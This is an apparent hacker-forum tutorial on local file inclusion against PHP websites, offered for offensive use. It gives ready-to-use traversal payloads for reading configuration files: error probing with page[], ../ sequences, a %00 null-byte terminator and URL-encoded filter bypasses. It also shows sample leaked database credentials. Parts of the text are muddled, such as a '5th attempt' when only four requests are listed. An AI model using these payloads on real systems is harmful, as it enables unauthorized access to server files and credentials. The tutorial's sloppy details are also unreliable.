LFI Tutorial [ _Informative_ & new techniques discussed ]

LFI = Local File Disclosure.
Definition: We use ../ to cycle or move backwords to our path of disclosure.

This is practically the same as RFI except we use local commands to retrieve data from the server. This is really useful if you want to get your hands on domain information or any other piece of data that isn’t meant for disclosure.

To determine whether the site is vulnerable or not, I’d recommend doing this:

http://site.com?page[]=contact

If you get an error such as this one:

Warning: main(Array) [function.main]: failed to open stream: No such file or directory in /home/gman/domains/site.com/site_data/index.php on line 299

Then that site might have a Local File Disclosure vulnerability.

Starting off, we know the coexisting dictionaries/files that are included on the website, so we have somewhat of acknowledgement of what the fuck is going on. Here are some of our attempts at getting some results in on the website:

http://site.com?page=../../../../home/gman/domains/site.com/site_data/login.php -- No Result
http://site.com?page=../../../../home/gman/domains/site.com/site_data/index.php -- No result
http://site.com?page=../../../../home/gman/domains/site.com/site_data/index1.php -- No result
http://site.com?page=../../../../home/gman/domains/site.com/site_data/config.php - Result!

As you can see, in our 5th attempt we were able to determine the configuration file, here’s what our final result was:

$dbhost    = "localhost";      /* Database Host */
$dbuser    = "ox010an_gman";  /* Database User Name*/
$dbpass    = "pseudoexpert";  /* Database Password */
$dbname    = "hax4life";     /* Database Name */

But our result was NOT showcased on the original index, nor did it respond correctly and insert our data in the field, how did we discover this? We used the „view-source:http://site.com?page=../../../../home/gman/domains/site.com/site_data/config.php“ function in Firefox to get the attributes.

Where you can locate your results in some cases:

A ) View the source code
B ) If there are any coexisting images, hover over them to see if your Local File Disclosure result is included
C ) Hover links/banners to see if your result was embedded there.

If your site doesn’t return a positive result, then the vulnerability is probably patched ) : . But don’t give up just yet, there is another solution!

http://site.com?page=../../../../home/gman/domains/site.com/site_data/config.php%00

Just as mentioned earlier, %00 terminates anything after that, and in PHP it is known as the „string terminator“;

If you are still bummed out, here are some basic bypass intrusions you can use to bypass filters webmasters have setup.

http://site.com?page=..%2F..%2F..%2F../home/gman/domains/site.com/site_data/config.php -- We can use URL encoding to bypass some restrictions the administrator may have setup. This can be used to bypass basic blacklisting by the administrator and/or bypass escaped characters.

http://site.com?page=..%2F..%2F..%2F..%2Fhome%2Fgman%2Fdomains%2Fsite.com%2Fsite_data%2F%0Aconfig.php -- This is the same as the above explanation except we encode everything (including ../ and / standards), the only thing we didn't encode was config.php because that is the file we want readable, and if we did encode it would encode our .PHP extension.

[/code]

The reason we used page[] is because the [ ] usually stimulate a error on the website, therefore returning us somewhat of „results“ or „path acknowledgement“ to the website.